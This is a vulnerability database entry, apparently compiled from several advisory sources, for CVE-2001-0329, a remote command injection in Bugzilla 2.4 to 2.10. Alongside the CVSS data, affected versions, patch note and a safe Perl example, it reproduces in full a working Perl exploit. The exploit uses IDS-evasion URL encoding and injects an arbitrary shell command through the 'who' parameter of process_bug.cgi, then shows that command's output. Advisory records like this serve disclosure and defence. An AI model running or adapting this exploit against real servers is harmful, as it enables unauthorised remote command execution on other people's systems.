CVE-2001-0329
Published: 2001-06-27 00:00:00
Revised: 2008-09-10 15:07:46
[Original] Bugzilla 2.10 allows remote attackers to execute arbitrary commands via shell metacharacters in a username that is then processed by (1) the Bugzilla_login cookie in post_bug.cgi, or (2) the who parameter in process_bug.cgi.
[CNNVD] Bugzilla Remote Arbitrary Command Execution Vulnerability (CNNVD-200106-140)
A vulnerability exists in Bugzilla 2.10. A remote attacker can execute arbitrary commands by means of shell metacharacters in a username, which are handled by (1) the Bugzilla_login cookie in post_bug.cgi or (2) the who parameter in process_bug.cgi.
-
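CVSS (Base Score)
CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [Information disclosure is likely]
Integrity impact: PARTIAL [System files may be modified]
Availability impact: PARTIAL [May degrade performance or interrupt access to resources]
Attack complexity: LOW [No access restrictions apply to exploitation]
Attack vector: [--]
Authentication: NONE [Exploitation requires no authentication]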
-
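CPE (Affected Platforms and Products)
cpe:/a:mozilla:bugzilla:2.8 Mozilla Bugzilla 2.8
cpe:/a:mozilla:bugzilla:2.10 Mozilla Bugzilla 2.10
cpe:/a:mozilla:bugzilla:2.4 Mozilla Bugzilla 2.4
cpe:/a:mozilla:bugzilla:2.6 Mozilla Bugzilla 2.6
-
OVAL (Technical Details for Detection)
-
Official Database Links
-
Other Links and Resources
-
Vulnerability Information
Vulnerability name: Bugzilla Remote Arbitrary Command Execution Vulnerability
Urgency: High
Vulnerability type: Input validation
Published: 2001-06-27 00:00:00
Updated: 2005-10-20 00:00:00
Attack path: Remote
Details:
A vulnerability exists in Bugzilla 2.10. A remote attacker can execute arbitrary commands by means of shell metacharacters in a username, which are handled by (1) the Bugzilla_login cookie in post_bug.cgi or (2) the who parameter in process_bug.cgi.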
-
Advisories and Patches
The vendor has addressed this issue in Bugzilla versions 2.12 and later.
Mozilla Bugzilla 2.10
Mozilla Bugzilla 2.4
Mozilla Bugzilla 2.6
Mozilla Bugzilla 2.8
-
Vulnerability Information (19909)
Vulnerability name: Mozilla Bugzilla 2.4/2.6/2.8/2.10 Remote Arbitrary Command Execution (EDBID:19909)
Affected platform: cgi
Vulnerability type: remote
Published: 2000-05-11
Verification status: Verified
Port: 0
Code author: Frank van Vliet karin
System download: N/A
source: http://www.securityfocus.com/bid/1199/info
Bugzilla is a web-based bug-tracking system based on Perl and MySQL. It allows people to submit bugs and catalogs them.
Bugzilla is prone to a vulnerability which may allow remote users to execute arbitrary commands on the target webserver.
When accepting a bug report, the script "process_bug.cgi" calls "./processmail" via a Perl system() call whose arguments include a number of parameters with values originating from user input via a web form. The script does not check these values for shell metacharacters before inserting them into the system() call.
As a result, it is possible for an attacker to supply maliciously crafted input to form fields which, when submitted, will cause arbitrary commands to be executed on the shell of the host running vulnerable versions of Bugzilla. Commands will be executed with the privileges of the webserver process.
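A safer call shape for the processmail invocation described above, as an added example that is not Bugzilla's code or part of the original advisory: an allow-list rejects the value first, and the list form of system() bypasses the shell. The names valid_login and notify, the sample values and the child perl standing in for ./processmail are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
$| = 1;    # keep parent and child output in order

# Constructed sample values; the second carries shell metacharacters.
my @samples = ('user@example.com', 'user@example.com;echo INJECTED');

# Hypothetical allow-list for a login name: a conservative e-mail shape with
# no whitespace, quotes or shell metacharacters.
sub valid_login {
    my ($who) = @_;
    return defined $who
        && $who =~ /\A[A-Za-z0-9._+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/;
}

# Stand-in for ./processmail (assumption): a child perl that prints its argv.
my @mailer = ($^X, '-e',
    'print scalar(@ARGV), " arg(s): [", join("][", @ARGV), "]\n"');

# Vulnerable shape described above (not executed here): one interpolated
# string, which perl hands to /bin/sh -c when it contains metacharacters.
#   system("./processmail $bug_id $who");

sub notify {
    my ($bug_id, $who) = @_;
    return 'rejected' unless $bug_id =~ /\A[0-9]+\z/ && valid_login($who);
    # List form: the program is exec'd directly with no shell, and each
    # list element becomes exactly one argv entry.
    my $rc = system(@mailer, $bug_id, $who);
    return $rc == 0 ? 'sent' : 'failed';
}

for my $who (@samples) {
    printf "%-32s => %s\n", $who, notify(42, $who);
}

# Defence in depth: even with validation skipped, the list form delivers
# the value as literal data in a single argument.
system(@mailer, 42, $samples[1]);
```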
#!/usr/bin/perl
# Bugzilla 2.8 remote exploit
# by {} - karin@root66.nl.eu.org
# RooT66 - http://root66.nl.eu.org
# ShellOracle - http://www.shelloracle.cjb.net
# b0f - http://b0f.freebsd.lublin.pl
#
# This exploit uses antiIDS tricks ripped from whisker
# next 2 functions stolen from whisker, commented by me
sub rstr { # no, this is not a cryptographically-robust number generator
my $str,$c;
$drift=(rand() * 10) % 10;
for($c=0;$c<10+$drift;$c++){
$str .= chr(((rand() * 26) % 26) + 97);} # yes, we only use a-z
return $str;}
sub antiIDS {
($url) = (@_);
$url =~s/([-a-zA-Z0-9.\<\>\\\|\'\`])/sprintf("%%%x",ord($1))/ge;
$url =~ s/\ /+/g;
$url =~s/\//\/.\//g;
return $url;
}
#end of stolen stuff
($complete_url, $Bugzilla_login, $Bugzilla_password, $command) = (@ARGV);
print("Exploit for Bugzilla up to version 2.8\n");
print(" by {} - karin\@root66.nl.eu.org\n");
print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
print("RooT66 - http://root66.nl.eu.org\n");
print("ShellOracle - http://www.shelloracle.cjb.net\n");
print("b0f - http://b0f.freebsd.lublin.pl\n");
print("\n");
if ($complete_url eq "-h" || $complete_url eq "--help") {
print("Usage: $0 url emailaddress password command\n");
exit;
}
# Get information of user
if (!$complete_url) {
print("URL: ");
$complete_url = <STDIN>; chomp($complete_url); $complete_url =~ s/http:\/\///;
}
if (!$Bugzilla_login) {
print("EMAIL: ");
$Bugzilla_login = <STDIN>; chomp($Bugzilla_login);
}
if (!$Bugzilla_password) {
print("PASSWORD: ");
$Bugzilla_password = <STDIN>; chomp($Bugzilla_password);
}
if (!$command) {
print("COMMAND: ");
$command = <STDIN>; chomp($command);
}
# Set some variables
$host = $complete_url; $host =~ s/\/.*//;
$base_dir = $complete_url; $base_dir =~ s/^$host//; $base_dir =~ s/[a-zA-Z.]*$//;
# Make own directory
system("mkdir $$");
print("Getting information needed to submit our 'bug'\n");
# Get product name
system("cd $$; lynx -source \"http://$host/" . antiIDS("$base_dir/enter_bug.cgi") . "?Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password") . "\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
if ($input =~ /enter_bug.cgi\?product=/) {
chomp($input);
$product = $input;
$product =~ s/.*product=//;
$product =~ s/".*//;
if ($product =~ /\&component=/) {
$component = $product;
$product =~ s/&.*//; # strip component
$component =~ s/.*component=//;
$component =~ s/".*//;
}
}
}
print("\tProduct: $product\n");
if ($component) {
print("\tComponent: $component\n");
}
# Get more information
$page = antiIDS("$base_dir/enter_bug.cgi?") . "product=" . antiIDS("$product") . "&Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password");
system("cd $$; lynx -dump \"http://$host/$page\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
chomp($input);
if ($input =~ /Reporter:/) {
$reporter = $input;
$reporter =~ s/.*Reporter: //;
$reporter =~ s/\ .*//;
}
if ($input =~ /Version:/) {
$version = $input;
$version =~ s/.*Version: \[//;
$version =~ s/\.*\].*//;
}
if ($input =~ /Component:/) {
$component = $input;
$component =~ s/.*Component: \[//;
$component =~ s/\.*\].*//;
}
if ($input =~ /Platform:/) {
$platform = $input;
$platform =~ s/.*Platform: \[//;
$platform =~ s/\.*\].*//;
}
if ($input =~ /OS:/) {
$os = $input;
$os =~ s/.*OS: \[//;
$os =~ s/\.*\].*//;
}
if ($input =~ /Priority:/) {
$priority = $input;
$priority =~ s/.*Priority: \[//;
$priority =~ s/\].*//;
}
if ($input =~ /Severity:/) {
$severity = $input;
$severity =~ s/.*Severity: \[//;
$severity =~ s/\.*\].*//;
}
}
print("\tReporter: $reporter\n");
print("\tVersion: $version\n");
print("\tComponent: $component\n");
print("\tPlatform: $platform\n");
print("\tOS: $os\n");
print("\tPriority: $priority\n");
print("\tSeverity: $severity\n");
close(FILE);
#liftoff
print("Sending evil bug report\n");
$page = antiIDS("$base_dir/process_bug.cgi") . "?bug_status=" . antiIDS("NEW") . "&reporter=" . antiIDS($reporter) . "&product=" . antiIDS("$product") . "&version=" . antiIDS("$version") . "&component=" . antiIDS("$component") . "&rep_platform=" . antiIDS("$platform") . "&op_sys=" . antiIDS($os) . "&priority=" . antiIDS($priority) . "&bug_severity=" . antiIDS($severity) . "&who=". antiIDS("blaat\@blaat.com;echo \\<pre\\>START OUTPUT COMMAND;$command;echo \\<\\/pre\\>END OUTPUT COMMAND;") . "&knob=" . antiIDS("duplicate") . "&dup_id=" . antiIDS("202021234123412341234") . "&Bugzilla_login=" . antiIDS($Bugzilla_login) . "&Bugzilla_password=" . antiIDS($Bugzilla_password) . "&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&form_name=enter_bug";
system("cd $$; lynx -dump \"$host/$page\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
chomp($input);
if ($input =~ /END OUTPUT COMMAND/) {
$startoutput = 0;
}
if ($startoutput) {
print("$input\n");
}
if ($input =~ /START OUTPUT COMMAND/) {
$startoutput = 1;
}
}
close(FILE);
# Delete shit
# system("rm -rf $$");
-
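Vulnerability Information
OSVDBID: 6364
Vulnerability name: Bugzilla post_bug.cgi Bugzilla_login Cookie Arbitrary Command Execution
Location:
Attack type:
Impact:
Solution:
Exploit:
Disclosure:
-
Vulnerability Description
-
Timeline
Disclosure date: 2000-05-11
Discovery date: Unknown
Exploit date: Unknown
Solution date: Unknown
-
Solution
-
References
-
Credit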